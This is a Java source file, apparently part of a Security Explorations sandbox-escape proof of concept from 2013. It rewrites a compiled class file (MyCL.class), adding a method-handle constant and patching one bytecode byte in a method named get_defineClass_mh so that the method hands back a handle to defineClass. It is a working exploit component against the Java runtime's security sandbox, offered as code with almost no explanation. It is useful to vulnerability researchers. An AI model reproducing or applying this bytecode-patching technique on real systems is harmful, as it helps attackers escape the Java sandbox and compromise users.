/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.security.*;
import java.io.*;
import java.applet.*;
import com.sun.tools.classfile.*;

public class GenFile {
 public static int TARGET_CODE_OFF = 1;
 public static int TARGET_CP_IDX   = 22;

 static ConstantPool translate_cp(ConstantPool cp) throws Throwable {
  ConstantPool.CPInfo[] pool=new ConstantPool.CPInfo[cp.size()+1];

  for (int i=1;i<cp.size();i++) {
   ConstantPool.CPInfo cpinfo=cp.get(i);
   pool[i]=cpinfo;
  }

  ConstantPool.CONSTANT_MethodHandle_info mhi=new ConstantPool.CONSTANT_MethodHandle_info(cp,ConstantPool.RefKind.REF_invokeVirtual,2);
  pool[cp.size()]=mhi;  

  return new ConstantPool(pool);
 }

 static Method translate_method(ConstantPool cp,Method m) throws Throwable {
  Attributes attributes=m.attributes;

  for(int i=0;i<attributes.size();i++) {
   Attribute a=attributes.get(i);
   String name=a.getName(cp);

   if (name.equals("Code")) {
    Code_attribute ca=(Code_attribute)a;
    byte code[]=ca.code;

    code[TARGET_CODE_OFF]=(byte)TARGET_CP_IDX;
   }
  }

  return m;
 }

 static Method[] translate_methods(ConstantPool cp,Method mtab[]) throws Throwable {
  for(int i=0;i<mtab.length;i++) {
   Method m=mtab[i];
   String name=m.getName(cp);

   if (name.equals("get_defineClass_mh")) {
    mtab[i]=translate_method(cp,mtab[i]);
   }
  }

  return mtab;
 }

 public static void main(String args[]) {
   try {
     String infile="MyCL.class";
     String outfile="MyCL.new.class";

     ClassFile cf=ClassFile.read(new File(infile));
     System.out.println("cf = "+cf);

     ConstantPool new_cp=translate_cp(cf.constant_pool);

     Method new_methods[]=translate_methods(new_cp,cf.methods);

     ClassFile out=new ClassFile(cf.magic,cf.minor_version,cf.major_version,
                                 new_cp,cf.access_flags,cf.this_class,
                                 cf.super_class,cf.interfaces,cf.fields,
                                 cf.methods,cf.attributes);

     ClassWriter cw=new ClassWriter();
     cw.write(out,new File(outfile));
     System.out.println("generated: "+outfile);
   } catch (Throwable e) {
    e.printStackTrace();
   }
  }
}
